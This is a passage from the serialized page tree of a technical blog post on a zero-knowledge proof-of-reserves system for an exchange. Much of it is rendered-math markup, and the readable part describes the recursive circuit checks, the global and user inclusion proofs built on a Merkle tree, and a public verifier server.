type":25,"tag":216,"props":99596,"children":99598},{"className":99597},[246,2151],[99599],{"type":31,"value":97009},{"type":25,"tag":216,"props":99601,"children":99603},{"className":99602},[246,2151],[99604],{"type":31,"value":2934},{"type":25,"tag":216,"props":99606,"children":99608},{"className":99607,"style":2752},[246],[99609],{"type":31,"value":7031},{"type":25,"tag":216,"props":99611,"children":99613},{"className":99612},[246,2151],[99614],{"type":31,"value":38},{"type":25,"tag":216,"props":99616,"children":99618},{"className":99617,"style":2752},[246,2151],[99619],{"type":31,"value":97829},{"type":25,"tag":216,"props":99621,"children":99623},{"className":99622},[246,2151],[99624],{"type":31,"value":2289},{"type":25,"tag":216,"props":99626,"children":99628},{"className":99627},[246,2151],[99629],{"type":31,"value":97044},{"type":25,"tag":216,"props":99631,"children":99633},{"className":99632},[287],[99634],{"type":31,"value":7701},{"type":25,"tag":216,"props":99636,"children":99638},{"className":99637},[246,2151],[99639],{"type":31,"value":162},{"type":25,"tag":216,"props":99641,"children":99643},{"className":99642},[246,2151],[99644],{"type":31,"value":97009},{"type":25,"tag":216,"props":99646,"children":99648},{"className":99647},[246,2151],[99649],{"type":31,"value":2934},{"type":25,"tag":216,"props":99651,"children":99653},{"className":99652,"style":2752},[246],[99654],{"type":31,"value":7031},{"type":25,"tag":216,"props":99656,"children":99658},{"className":99657},[246,2151],[99659],{"type":31,"value":2196},{"type":25,"tag":216,"props":99661,"children":99663},{"className":99662},[246,2151],[99664],{"type":31,"value":97272},{"type":25,"tag":216,"props":99666,"children":99668},{"className":99667},[246,2151],[99669],{"type":31,"value":55102},{"type":25,"tag":216,"props":99671,"children":99673},{"className":99672},[427],[99674],{"type":31,"value":19368},{"type":25,"tag":216,"props":99676,"children":99678},{"className":99677,"style":258},[257],[],{"type":25,"tag":216,"props":99680,"children":99682},{"className":99681},[263],[99683],{"type":31,"value":12528},{"type":25,"tag":216,"props":99685,"children":99687},{"className":99686,"style":258},[257],[],{"type":25,"tag":216,"props":99689,"children":99691},{"className":99690},[235],[99692,99696,99701,99706,99711,99716,99721,99778,99783,99788,99793,99798,99803,99808,99813,99818,99823,99828,99833,99838,99843,99848,99853,99858,99863,99868,99873,99878,99883,99888,99893],{"type":25,"tag":216,"props":99693,"children":99695},{"className":99694,"style":96960},[240],[],{"type":25,"tag":216,"props":99697,"children":99699},{"className":99698},[246,2151],[99700],{"type":31,"value":3245},{"type":25,"tag":216,"props":99702,"children":99704},{"className":99703},[246,2151],[99705],{"type":31,"value":97272},{"type":25,"tag":216,"props":99707,"children":99709},{"className":99708},[246,2151],[99710],{"type":31,"value":7171},{"type":25,"tag":216,"props":99712,"children":99714},{"className":99713},[246,2151],[99715],{"type":31,"value":38},{"type":25,"tag":216,"props":99717,"children":99719},{"className":99718},[246,2151],[99720],{"type":31,"value":99351},{"type":25,"tag":216,"props":99722,"children":99724},{"className":99723},[246],[99725,99730],{"type":25,"tag":216,"props":99726,"children":99728},{"className":99727,"style":99359},[246,2151],[99729],{"type":31,"value":37047},{"type":25,"tag":216,"props":99731,"children":99733},{"className":99732},[2159],[99734],{"type":25,"tag":216,"props":99735,"children":99737},{"className":99736},[298,299],[99738,99767],{"type":25,"tag":216,"props":99739,"children":99741},{"className":99740},[304],[99742,99762],{"type":25,"tag":216,"props":99743,"children":99745},{"className":99744,"style":2270},[309],[99746],{"type":25,"tag":216,"props":99747,"children":99748},{"style":99380},[99749,99753],{"type":25,"tag":216,"props":99750,"children":99752},{"className":99751,"style":2181},[319],[],{"type":25,"tag":216,"props":99754,"children":99756},{"className":99755},[2186,2187,2188,2189],[99757],{"type":25,"tag":216,"props":99758,"children":99760},{"className":99759},[246,2151,2189],[99761],{"type":31,"value":2289},{"type":25,"tag":216,"props":99763,"children":99765},{"className":99764},[408],[99766],{"type":31,"value":411},{"type":25,"tag":216,"props":99768,"children":99770},{"className":99769},[304],[99771],{"type":25,"tag":216,"props":99772,"children":99774},{"className":99773,"style":2209},[309],[99775],{"type":25,"tag":216,"props":99776,"children":99777},{},[],{"type":25,"tag":216,"props":99779,"children":99781},{"className":99780},[246],[99782],{"type":31,"value":179},{"type":25,"tag":216,"props":99784,"children":99786},{"className":99785},[246,2151],[99787],{"type":31,"value":38},{"type":25,"tag":216,"props":99789,"children":99791},{"className":99790},[246,2151],[99792],{"type":31,"value":97272},{"type":25,"tag":216,"props":99794,"children":99796},{"className":99795},[246,2151],[99797],{"type":31,"value":7171},{"type":25,"tag":216,"props":99799,"children":99801},{"className":99800,"style":97029},[246,2151],[99802],{"type":31,"value":97032},{"type":25,"tag":216,"props":99804,"children":99806},{"className":99805},[246,2151],[99807],{"type":31,"value":2289},{"type":25,"tag":216,"props":99809,"children":99811},{"className":99810},[246,2151],[99812],{"type":31,"value":2254},{"type":25,"tag":216,"props":99814,"children":99816},{"className":99815,"style":2752},[246],[99817],{"type":31,"value":7031},{"type":25,"tag":216,"props":99819,"children":99821},{"className":99820},[246,2151],[99822],{"type":31,"value":99456},{"type":25,"tag":216,"props":99824,"children":99826},{"className":99825},[246,2151],[99827],{"type":31,"value":38},{"type":25,"tag":216,"props":99829,"children":99831},{"className":99830},[246,2151],[99832],{"type":31,"value":97272},{"type":25,"tag":216,"props":99834,"children":99836},{"className":99835},[246,2151],[99837],{"type":31,"value":2934},{"type":25,"tag":216,"props":99839,"children":99841},{"className":99840},[246],[99842],{"type":31,"value":179},{"type":25,"tag":216,"props":99844,"children":99846},{"className":99845},[246,2151],[99847],{"type":31,"value":162},{"type":25,"tag":216,"props":99849,"children":99851},{"className":99850},[246,2151],[99852],{"type":31,"value":97009},{"type":25,"tag":216,"props":99854,"children":99856},{"className":99855},[246,2151],[99857],{"type":31,"value":2934},{"type":25,"tag":216,"props":99859,"children":99861},{"className":99860,"style":2752},[246],[99862],{"type":31,"value":7031},{"type":25,"tag":216,"props":99864,"children":99866},{"className":99865},[246,2151],[99867],{"type":31,"value":38},{"type":25,"tag":216,"props":99869,"children":99871},{"className":99870,"style":2752},[246,2151],[99872],{"type":31,"value":97829},{"type":25,"tag":216,"props":99874,"children":99876},{"className":99875},[246,2151],[99877],{"type":31,"value":2289},{"type":25,"tag":216,"props":99879,"children":99881},{"className":99880},[246,2151],[99882],{"type":31,"value":97840},{"type":25,"tag":216,"props":99884,"children":99886},{"className":99885},[287],[99887],{"type":31,"value":7701},{"type":25,"tag":216,"props":99889,"children":99891},{"className":99890},[246],[99892],{"type":31,"value":1882},{"type":25,"tag":216,"props":99894,"children":99896},{"className":99895},[427],[99897],{"type":31,"value":19368},{"type":25,"tag":2043,"props":99899,"children":99900},{},[99901,100259,100260],{"type":25,"tag":82,"props":99902,"children":99904},{"className":99903},[212,4702],[99905],{"type":25,"tag":216,"props":99906,"children":99908},{"className":99907},[224],[99909],{"type":25,"tag":216,"props":99910,"children":99912},{"className":99911,"ariaHidden":230},[229],[99913,100019],{"type":25,"tag":216,"props":99914,"children":99916},{"className":99915},[235],[99917,99921,99926,99931,99936,99941,99946,99951,99956,99961,99966,99971,99976,99981,99986,99991,99996,100001,100006,100010,100015],{"type":25,"tag":216,"props":99918,"children":99920},{"className":99919,"style":96960},[240],[],{"type":25,"tag":216,"props":99922,"children":99924},{"className":99923},[246,2151],[99925],{"type":31,"value":162},{"type":25,"tag":216,"props":99927,"children":99929},{"className":99928},[246,2151],[99930],{"type":31,"value":97009},{"type":25,"tag":216,"props":99932,"children":99934},{"className":99933},[246,2151],[99935],{"type":31,"value":2934},{"type":25,"tag":216,"props":99937,"children":99939},{"className":99938,"style":2752},[246],[99940],{"type":31,"value":7031},{"type":25,"tag":216,"props":99942,"children":99944},{"className":99943},[246,2151],[99945],{"type":31,"value":38},{"type":25,"tag":216,"props":99947,"children":99949},{"className":99948,"style":2752},[246,2151],[99950],{"type":31,"value":97829},{"type":25,"tag":216,"props":99952,"children":99954},{"className":99953},[246,2151],[99955],{"type":31,"value":2289},{"type":25,"tag":216,"props":99957,"children":99959},{"className":99958},[246,2151],[99960],{"type":31,"value":97044},{"type":25,"tag":216,"props":99962,"children":99964},{"className":99963},[287],[99965],{"type":31,"value":7701},{"type":25,"tag":216,"props":99967,"children":99969},{"className":99968},[246,2151],[99970],{"type":31,"value":162},{"type":25,"tag":216,"props":99972,"children":99974},{"className":99973},[246,2151],[99975],{"type":31,"value":97009},{"type":25,"tag":216,"props":99977,"children":99979},{"className":99978},[246,2151],[99980],{"type":31,"value":2934},{"type":25,"tag":216,"props":99982,"children":99984},{"className":99983,"style":2752},[246],[99985],{"type":31,"value":7031},{"type":25,"tag":216,"props":99987,"children":99989},{"className":99988},[246,2151],[99990],{"type":31,"value":2196},{"type":25,"tag":216,"props":99992,"children":99994},{"className":99993},[246,2151],[99995],{"type":31,"value":97272},{"type":25,"tag":216,"props":99997,"children":99999},{"className":99998},[246,2151],[100000],{"type":31,"value":55102},{"type":25,"tag":216,"props":100002,"children":100004},{"className":100003},[427],[100005],{"type":31,"value":19368},{"type":25,"tag":216,"props":100007,"children":100009},{"className":100008,"style":258},[257],[],{"type":25,"tag":216,"props":100011,"children":100013},{"className":100012},[263],[100014],{"type":31,"value":12528},{"type":25,"tag":216,"props":100016,"children":100018},{"className":100017,"style":258},[257],[],{"type":25,"tag":216,"props":100020,"children":100022},{"className":100021},[235],[100023,100027,100032,100037,100042,100047,100052,100109,100114,100119,100124,100129,100134,100139,100144,100149,100154,100159,100164,100169,100174,100179,100184,100189,100194,100199,100204,100209,100214,100219,100224,100229,100234,100239,100244,100249,100254],{"type":25,"tag":216,"props":100024,"children":100026},{"className":100025,"style":96960},[240],[],{"type":25,"tag":216,"props":100028,"children":100030},{"className":100029},[246,2151],[100031],{"type":31,"value":3245},{"type":25,"tag":216,"props":100033,"children":100035},{"className":100034},[246,2151],[100036],{"type":31,"value":97272},{"type":25,"tag":216,"props":100038,"children":100040},{"className":100039},[246,2151],[100041],{"type":31,"value":7171},{"type":25,"tag":216,"props":100043,"children":100045},{"className":100044},[246,2151],[100046],{"type":31,"value":38},{"type":25,"tag":216,"props":100048,"children":100050},{"className":100049},[246,2151],[100051],{"type":31,"value":99351},{"type":25,"tag":216,"props":100053,"children":100055},{"className":100054},[246],[100056,100061],{"type":25,"tag":216,"props":100057,"children":100059},{"className":100058,"style":99359},[246,2151],[100060],{"type":31,"value":37047},{"type":25,"tag":216,"props":100062,"children":100064},{"className":100063},[2159],[100065],{"type":25,"tag":216,"props":100066,"children":100068},{"className":100067},[298,299],[100069,100098],{"type":25,"tag":216,"props":100070,"children":100072},{"className":100071},[304],[100073,100093],{"type":25,"tag":216,"props":100074,"children":100076},{"className":100075,"style":2270},[309],[100077],{"type":25,"tag":216,"props":100078,"children":100079},{"style":99380},[100080,100084],{"type":25,"tag":216,"props":100081,"children":100083},{"className":100082,"style":2181},[319],[],{"type":25,"tag":216,"props":100085,"children":100087},{"className":100086},[2186,2187,2188,2189],[100088],{"type":25,"tag":216,"props":100089,"children":100091},{"className":100090},[246,2151,2189],[100092],{"type":31,"value":2289},{"type":25,"tag":216,"props":100094,"children":100096},{"className":100095},[408],[100097],{"type":31,"value":411},{"type":25,"tag":216,"props":100099,"children":100101},{"className":100100},[304],[100102],{"type":25,"tag":216,"props":100103,"children":100105},{"className":100104,"style":2209},[309],[100106],{"type":25,"tag":216,"props":100107,"children":100108},{},[],{"type":25,"tag":216,"props":100110,"children":100112},{"className":100111},[246],[100113],{"type":31,"value":179},{"type":25,"tag":216,"props":100115,"children":100117},{"className":100116},[246,2151],[100118],{"type":31,"value":38},{"type":25,"tag":216,"props":100120,"children":100122},{"className":100121},[246,2151],[100123],{"type":31,"value":97272},{"type":25,"tag":216,"props":100125,"children":100127},{"className":100126},[246,2151],[100128],{"type":31,"value":7171},{"type":25,"tag":216,"props":100130,"children":100132},{"className":100131,"style":97029},[246,2151],[100133],{"type":31,"value":97032},{"type":25,"tag":216,"props":100135,"children":100137},{"className":100136},[246,2151],[100138],{"type":31,"value":2289},{"type":25,"tag":216,"props":100140,"children":100142},{"className":100141},[246,2151],[100143],{"type":31,"value":2254},{"type":25,"tag":216,"props":100145,"children":100147},{"className":100146,"style":2752},[246],[100148],{"type":31,"value":7031},{"type":25,"tag":216,"props":100150,"children":100152},{"className":100151},[246,2151],[100153],{"type":31,"value":99456},{"type":25,"tag":216,"props":100155,"children":100157},{"className":100156},[246,2151],[100158],{"type":31,"value":38},{"type":25,"tag":216,"props":100160,"children":100162},{"className":100161},[246,2151],[100163],{"type":31,"value":97272},{"type":25,"tag":216,"props":100165,"children":100167},{"className":100166},[246,2151],[100168],{"type":31,"value":2934},{"type":25,"tag":216,"props":100170,"children":100172},{"className":100171},[246],[100173],{"type":31,"value":179},{"type":25,"tag":216,"props":100175,"children":100177},{"className":100176},[246,2151],[100178],{"type":31,"value":162},{"type":25,"tag":216,"props":100180,"children":100182},{"className":100181},[246,2151],[100183],{"type":31,"value":97009},{"type":25,"tag":216,"props":100185,"children":100187},{"className":100186},[246,2151],[100188],{"type":31,"value":2934},{"type":25,"tag":216,"props":100190,"children":100192},{"className":100191,"style":2752},[246],[100193],{"type":31,"value":7031},{"type":25,"tag":216,"props":100195,"children":100197},{"className":100196},[246,2151],[100198],{"type":31,"value":38},{"type":25,"tag":216,"props":100200,"children":100202},{"className":100201,"style":2752},[246,2151],[100203],{"type":31,"value":97829},{"type":25,"tag":216,"props":100205,"children":100207},{"className":100206},[246,2151],[100208],{"type":31,"value":2289},{"type":25,"tag":216,"props":100210,"children":100212},{"className":100211},[246,2151],[100213],{"type":31,"value":97840},{"type":25,"tag":216,"props":100215,"children":100217},{"className":100216},[287],[100218],{"type":31,"value":7701},{"type":25,"tag":216,"props":100220,"children":100222},{"className":100221},[246,2151],[100223],{"type":31,"value":162},{"type":25,"tag":216,"props":100225,"children":100227},{"className":100226},[246,2151],[100228],{"type":31,"value":97009},{"type":25,"tag":216,"props":100230,"children":100232},{"className":100231},[246,2151],[100233],{"type":31,"value":2934},{"type":25,"tag":216,"props":100235,"children":100237},{"className":100236,"style":2752},[246],[100238],{"type":31,"value":7031},{"type":25,"tag":216,"props":100240,"children":100242},{"className":100241},[246,2151],[100243],{"type":31,"value":2196},{"type":25,"tag":216,"props":100245,"children":100247},{"className":100246},[246,2151],[100248],{"type":31,"value":97272},{"type":25,"tag":216,"props":100250,"children":100252},{"className":100251},[246,2151],[100253],{"type":31,"value":55102},{"type":25,"tag":216,"props":100255,"children":100257},{"className":100256},[427],[100258],{"type":31,"value":19368},{"type":31,"value":10409},{"type":25,"tag":9273,"props":100261,"children":100262},{},[100263],{"type":31,"value":100264},"(verifies if all asset prices are the same)",{"type":25,"tag":2043,"props":100266,"children":100267},{},[100268,100647,100648],{"type":25,"tag":82,"props":100269,"children":100271},{"className":100270},[212,4702],[100272],{"type":25,"tag":216,"props":100273,"children":100275},{"className":100274},[224],[100276],{"type":25,"tag":216,"props":100277,"children":100279},{"className":100278,"ariaHidden":230},[229],[100280,100361],{"type":25,"tag":216,"props":100281,"children":100283},{"className":100282},[235],[100284,100288,100293,100298,100303,100308,100313,100318,100323,100328,100333,100338,100343,100348,100352,100357],{"type":25,"tag":216,"props":100285,"children":100287},{"className":100286,"style":241},[240],[],{"type":25,"tag":216,"props":100289,"children":100291},{"className":100290},[246,2151],[100292],{"type":31,"value":55102},{"type":25,"tag":216,"props":100294,"children":100296},{"className":100295,"style":2752},[246,2151],[100297],{"type":31,"value":98433},{"type":25,"tag":216,"props":100299,"children":100301},{"className":100300,"style":98437},[246,2151],[100302],{"type":31,"value":92655},{"type":25,"tag":216,"props":100304,"children":100306},{"className":100305,"style":97029},[246,2151],[100307],{"type":31,"value":97032},{"type":25,"tag":216,"props":100309,"children":100311},{"className":100310},[246,2151],[100312],{"type":31,"value":2399},{"type":25,"tag":216,"props":100314,"children":100316},{"className":100315,"style":2752},[246],[100317],{"type":31,"value":7031},{"type":25,"tag":216,"props":100319,"children":100321},{"className":100320},[246,2151],[100322],{"type":31,"value":2934},{"type":25,"tag":216,"props":100324,"children":100326},{"className":100325},[246,2151],[100327],{"type":31,"value":98465},{"type":25,"tag":216,"props":100329,"children":100331},{"className":100330,"style":2752},[246],[100332],{"type":31,"value":7031},{"type":25,"tag":216,"props":100334,"children":100336},{"className":100335},[246,2151],[100337],{"type":31,"value":98476},{"type":25,"tag":216,"props":100339,"children":100341},{"className":100340},[246,2151],[100342],{"type":31,"value":3245},{"type":25,"tag":216,"props":100344,"children":100346},{"className":100345},[246,2151],[100347],{"type":31,"value":2611},{"type":25,"tag":216,"props":100349,"children":100351},{"className":100350,"style":258},[257],[],{"type":25,"tag":216,"props":100353,"children":100355},{"className":100354},[263],[100356],{"type":31,"value":12528},{"type":25,"tag":216,"props":100358,"children":100360},{"className":100359,"style":258},[257],[],{"type":25,"tag":216,"props":100362,"children":100364},{"className":100363},[235],[100365,100369,100374,100379,100384,100389,100394,100399,100404,100409,100414,100471,100476,100480,100485,100490,100547,100552,100556,100561,100566,100570,100575,100580,100642],{"type":25,"tag":216,"props":100366,"children":100368},{"className":100367,"style":5513},[240],[],{"type":25,"tag":216,"props":100370,"children":100372},{"className":100371,"style":2152},[246,2151],[100373],{"type":31,"value":2155},{"type":25,"tag":216,"props":100375,"children":100377},{"className":100376},[246,2151],[100378],{"type":31,"value":96972},{"type":25,"tag":216,"props":100380,"children":100382},{"className":100381},[246,2151],[100383],{"type":31,"value":2289},{"type":25,"tag":216,"props":100385,"children":100387},{"className":100386},[246,2151],[100388],{"type":31,"value":74534},{"type":25,"tag":216,"props":100390,"children":100392},{"className":100391},[246,2151],[100393],{"type":31,"value":96988},{"type":25,"tag":216,"props":100395,"children":100397},{"className":100396},[246,2151],[100398],{"type":31,"value":2196},{"type":25,"tag":216,"props":100400,"children":100402},{"className":100401},[287],[100403],{"type":31,"value":1850},{"type":25,"tag":216,"props":100405,"children":100407},{"className":100406},[246,2151],[100408],{"type":31,"value":98476},{"type":25,"tag":216,"props":100410,"children":100412},{"className":100411},[246,2151],[100413],{"type":31,"value":3245},{"type":25,"tag":216,"props":100415,"children":100417},{"className":100416},[246],[100418,100423],{"type":25,"tag":216,"props":100419,"children":100421},{"className":100420},[246,2151],[100422],{"type":31,"value":2611},{"type":25,"tag":216,"props":100424,"children":100426},{"className":100425},[2159],[100427],{"type":25,"tag":216,"props":100428,"children":100430},{"className":100429},[298,299],[100431,100460],{"type":25,"tag":216,"props":100432,"children":100434},{"className":100433},[304],[100435,100455],{"type":25,"tag":216,"props":100436,"children":100438},{"className":100437,"style":97069},[309],[100439],{"type":25,"tag":216,"props":100440,"children":100441},{"style":2274},[100442,100446],{"type":25,"tag":216,"props":100443,"children":100445},{"className":100444,"style":2181},[319],[],{"type":25,"tag":216,"props":100447,"children":100449},{"className":100448},[2186,2187,2188,2189],[100450],{"type":25,"tag":216,"props":100451,"children":100453},{"className":100452},[246,2189],[100454],{"type":31,"value":1882},{"type":25,"tag":216,"props":100456,"children":100458},{"className":100457},[408],[100459],{"type":31,"value":411},{"type":25,"tag":216,"props":100461,"children":100463},{"className":100462},[304],[100464],{"type":25,"tag":216,"props":100465,"children":100467},{"className":100466,"style":2209},[309],[100468],{"type":25,"tag":216,"props":100469,"children":100470},{},[],{"type":25,"tag":216,"props":100472,"children":100474},{"className":100473},[1864],[100475],{"type":31,"value":1867},{"type":25,"tag":216,"props":100477,"children":100479},{"className":100478,"style":1871},[257],[],{"type":25,"tag":216,"props":100481,"children":100483},{"className":100482},[246,2151],[100484],{"type":31,"value":98476},{"type":25,"tag":216,"props":100486,"children":100488},{"className":100487},[246,2151],[100489],{"type":31,"value":3245},{"type":25,"tag":216,"props":100491,"children":100493},{"className":100492},[246],[100494,100499],{"type":25,"tag":216,"props":100495,"children":100497},{"className":100496},[246,2151],[100498],{"type":31,"value":2611},{"type":25,"tag":216,"props":100500,"children":100502},{"className":100501},[2159],[100503],{"type":25,"tag":216,"props":100504,"children":100506},{"className":100505},[298,299],[100507,100536],{"type":25,"tag":216,"props":100508,"children":100510},{"className":100509},[304],[100511,100531],{"type":25,"tag":216,"props":100512,"children":100514},{"className":100513,"style":97069},[309],[100515],{"type":25,"tag":216,"props":100516,"children":100517},{"style":2274},[100518,100522],{"type":25,"tag":216,"props":100519,"children":100521},{"className":100520,"style":2181},[319],[],{"type":25,"tag":216,"props":100523,"children":100525},{"className":100524},[2186,2187,2188,2189],[100526],{"type":25,"tag":216,"props":100527,"children":100529},{"className":100528},[246,2189],[100530],{"type":31,"value":184},{"type":25,"tag":216,"props":100532,"children":100534},{"className":100533},[408],[100535],{"type":31,"value":411},{"type":25,"tag":216,"props":100537,"children":100539},{"className":100538},[304],[100540],{"type":25,"tag":216,"props":100541,"children":100543},{"className":100542,"style":2209},[309],[100544],{"type":25,"tag":216,"props":100545,"children":100546},{},[],{"type":25,"tag":216,"props":100548,"children":100550},{"className":100549},[1864],[100551],{"type":31,"value":1867},{"type":25,"tag":216,"props":100553,"children":100555},{"className":100554,"style":1871},[257],[],{"type":25,"tag":216,"props":100557,"children":100559},{"className":100558},[246],[100560],{"type":31,"value":13547},{"type":25,"tag":216,"props":100562,"children":100564},{"className":100563},[1864],[100565],{"type":31,"value":1867},{"type":25,"tag":216,"props":100567,"children":100569},{"className":100568,"style":1871},[257],[],{"type":25,"tag":216,"props":100571,"children":100573},{"className":100572},[246,2151],[100574],{"type":31,"value":98476},{"type":25,"tag":216,"props":100576,"children":100578},{"className":100577},[246,2151],[100579],{"type":31,"value":3245},{"type":25,"tag":216,"props":100581,"children":100583},{"className":100582},[246],[100584,100589],{"type":25,"tag":216,"props":100585,"children":100587},{"className":100586},[246,2151],[100588],{"type":31,"value":2611},{"type":25,"tag":216,"props":100590,"children":100592},{"className":100591},[2159],[100593],{"type":25,"tag":216,"props":100594,"children":100596},{"className":100595},[298,299],[100597,100631],{"type":25,"tag":216,"props":100598,"children":100600},{"className":100599},[304],[100601,100626],{"type":25,"tag":216,"props":100602,"children":100604},{"className":100603,"style":97069},[309],[100605],{"type":25,"tag":216,"props":100606,"children":100607},{"style":2274},[100608,100612],{"type":25,"tag":216,"props":100609,"children":100611},{"className":100610,"style":2181},[319],[],{"type":25,"tag":216,"props":100613,"children":100615},{"className":100614},[2186,2187,2188,2189],[100616],{"type":25,"tag":216,"props":100617,"children":100619},{"className":100618},[246,2189],[100620],{"type":25,"tag":216,"props":100621,"children":100623},{"className":100622},[246,2189],[100624],{"type":31,"value":100625},"31",{"type":25,"tag":216,"props":100627,"children":100629},{"className":100628},[408],[100630],{"type":31,"value":411},{"type":25,"tag":216,"props":100632,"children":100634},{"className":100633},[304],[100635],{"type":25,"tag":216,"props":100636,"children":100638},{"className":100637,"style":2209},[309],[100639],{"type":25,"tag":216,"props":100640,"children":100641},{},[],{"type":25,"tag":216,"props":100643,"children":100645},{"className":100644},[427],[100646],{"type":31,"value":1888},{"type":31,"value":10409},{"type":25,"tag":9273,"props":100649,"children":100650},{},[100651],{"type":31,"value":98796},{"type":25,"tag":2043,"props":100653,"children":100654},{},[100655,100660,100661],{"type":25,"tag":64,"props":100656,"children":100657},{},[100658],{"type":31,"value":100659},"checks if each sum is overflowing by checking if the sum of two positive numbers results in a negative one",{"type":31,"value":10409},{"type":25,"tag":9273,"props":100662,"children":100663},{},[100664],{"type":31,"value":99077},{"type":25,"tag":38,"props":100666,"children":100667},{},[100668],{"type":31,"value":100669},"Here is a visual scheme of the inputs of the recursive circuit. Note that this tree only has three levels (L1, L2, L3). Depending on the number of users, it may have more recursive levels:",{"type":25,"tag":38,"props":100671,"children":100672},{},[100673],{"type":25,"tag":6467,"props":100674,"children":100676},{"alt":54547,"src":100675},"/posts/por/recursive-circuit.png",[],{"type":25,"tag":26,"props":100678,"children":100680},{"id":100679},"global-proof-and-inclusion-proofs",[100681],{"type":31,"value":100682},"Global Proof and Inclusion Proofs",{"type":25,"tag":606,"props":100684,"children":100685},{"id":13237},[100686],{"type":31,"value":100687},"Proving",{"type":25,"tag":38,"props":100689,"children":100690},{},[100691,100693,100699,100700,100706,100707,100713],{"type":31,"value":100692},"After proving all batch circuits and all recursive circuits, we have the final proof (which is the ZK proof of the recursive tree root), the entire Merkle tree, and the user nonces. In our code, it is serialized to ",{"type":25,"tag":82,"props":100694,"children":100696},{"className":100695},[],[100697],{"type":31,"value":100698},"merkle_tree.json",{"type":31,"value":7026},{"type":25,"tag":82,"props":100701,"children":100703},{"className":100702},[],[100704],{"type":31,"value":100705},"final_proof.json",{"type":31,"value":10439},{"type":25,"tag":82,"props":100708,"children":100710},{"className":100709},[],[100711],{"type":31,"value":100712},"private_nonces.json",{"type":31,"value":100714}," files.",{"type":25,"tag":38,"props":100716,"children":100717},{},[100718],{"type":31,"value":100719},"Using the ZK proof and the Merkle tree, we can already prove the sum of the asset balances and their non-negativity; we refer to this as the \"global proof.\"",{"type":25,"tag":38,"props":100721,"children":100722},{},[100723,100725,100731,100733,100738],{"type":31,"value":100724},"For the user inclusion proofs, we get the Merkle tree, the user asset balances, the identification hash, and the nonce to bundle it in one proof file (",{"type":25,"tag":82,"props":100726,"children":100728},{"className":100727},[],[100729],{"type":31,"value":100730},"inclusion_proof_\u003Cid>.json",{"type":31,"value":100732},"). ",{"type":25,"tag":64,"props":100734,"children":100735},{},[100736],{"type":31,"value":100737},"We bundle only a part of the Merkle tree to the inclusion proof file to make the proof smaller",{"type":31,"value":179},{"type":25,"tag":606,"props":100740,"children":100742},{"id":100741},"verifying",[100743],{"type":31,"value":100744},"Verifying",{"type":25,"tag":38,"props":100746,"children":100747},{},[100748],{"type":25,"tag":9273,"props":100749,"children":100750},{},[100751],{"type":31,"value":100752},"Global Proof",{"type":25,"tag":38,"props":100754,"children":100755},{},[100756,100758,100763,100764,100769],{"type":31,"value":100757},"To verify the global proof, the code deserializes the ",{"type":25,"tag":82,"props":100759,"children":100761},{"className":100760},[],[100762],{"type":31,"value":100698},{"type":31,"value":41513},{"type":25,"tag":82,"props":100765,"children":100767},{"className":100766},[],[100768],{"type":31,"value":100705},{"type":31,"value":100770}," files and performs these checks:",{"type":25,"tag":6711,"props":100772,"children":100773},{},[100774,100779,100784,100789,100815],{"type":25,"tag":2043,"props":100775,"children":100776},{},[100777],{"type":31,"value":100778},"Validate if the final proof was generated with a valid and trusted circuit.",{"type":25,"tag":2043,"props":100780,"children":100781},{},[100782],{"type":31,"value":100783},"Verify the ZK final proof.",{"type":25,"tag":2043,"props":100785,"children":100786},{},[100787],{"type":31,"value":100788},"Verify if asset prices are valid. (It doesn't verify if it matches the real price; you need to do it manually. It only verifies if decimals are valid.)",{"type":25,"tag":2043,"props":100790,"children":100791},{},[100792,100794,100800,100802,100807,100808,100813],{"type":31,"value":100793},"Verify if the Merkle tree root hash is the same as the final proof ",{"type":25,"tag":82,"props":100795,"children":100797},{"className":100796},[],[100798],{"type":31,"value":100799},"merkle_tree_hash",{"type":31,"value":100801}," public input. This ensures that the ",{"type":25,"tag":82,"props":100803,"children":100805},{"className":100804},[],[100806],{"type":31,"value":100698},{"type":31,"value":1307},{"type":25,"tag":82,"props":100809,"children":100811},{"className":100810},[],[100812],{"type":31,"value":100705},{"type":31,"value":100814}," are linked (they belong to the same global proof).",{"type":25,"tag":2043,"props":100816,"children":100817},{},[100818],{"type":31,"value":100819},"Verify the entire Merkle tree by hashing all the nodes again, starting with the batch circuit, since the verifier won't have the necessary information to hash the leaves again (for privacy). This ensures that the tree was not tampered with.",{"type":25,"tag":38,"props":100821,"children":100822},{},[100823],{"type":25,"tag":9273,"props":100824,"children":100825},{},[100826],{"type":31,"value":100827},"Inclusion Proof",{"type":25,"tag":38,"props":100829,"children":100830},{},[100831,100833,100838,100840,100845],{"type":31,"value":100832},"To verify the inclusion proof, the code deserializes the ",{"type":25,"tag":82,"props":100834,"children":100836},{"className":100835},[],[100837],{"type":31,"value":100730},{"type":31,"value":100839}," file and also the ",{"type":25,"tag":82,"props":100841,"children":100843},{"className":100842},[],[100844],{"type":31,"value":100705},{"type":31,"value":100846},". After that, it performs these checks:",{"type":25,"tag":6711,"props":100848,"children":100849},{},[100850,100854,100859,100864],{"type":25,"tag":2043,"props":100851,"children":100852},{},[100853],{"type":31,"value":100783},{"type":25,"tag":2043,"props":100855,"children":100856},{},[100857],{"type":31,"value":100858},"Verify if the Merkle tree root is the same as in the final proof.",{"type":25,"tag":2043,"props":100860,"children":100861},{},[100862],{"type":31,"value":100863},"Recalculate the user-related node leaf hash.",{"type":25,"tag":2043,"props":100865,"children":100866},{},[100867],{"type":31,"value":100868},"Verify a partial Merkle tree using the recalculated hash (it doesn't contain all the leaves).",{"type":25,"tag":26,"props":100870,"children":100872},{"id":100871},"por-verifier-server",[100873],{"type":31,"value":100874},"PoR Verifier Server",{"type":25,"tag":38,"props":100876,"children":100877},{},[100878,100880,100886],{"type":31,"value":100879},"To automate the verification process, we created a ",{"type":25,"tag":162,"props":100881,"children":100883},{"href":96529,"rel":100882},[166],[100884],{"type":31,"value":100885},"verifier server",{"type":31,"value":100887}," that the exchange can submit the proofs into. Once submitted, the proof is validated and added to the database.",{"type":25,"tag":38,"props":100889,"children":100890},{},[100891],{"type":31,"value":100892},"Once the proof was added, any user can enter the website and see its information (see backpack's example):",{"type":25,"tag":38,"props":100894,"children":100895},{},[100896],{"type":25,"tag":6467,"props":100897,"children":100899},{"alt":54547,"src":100898},"/posts/por/backpack-por.png",[],{"type":25,"tag":38,"props":100901,"children":100902},{},[100903],{"type":31,"value":100904},"Here is a breakdown of what fields represent and why they are 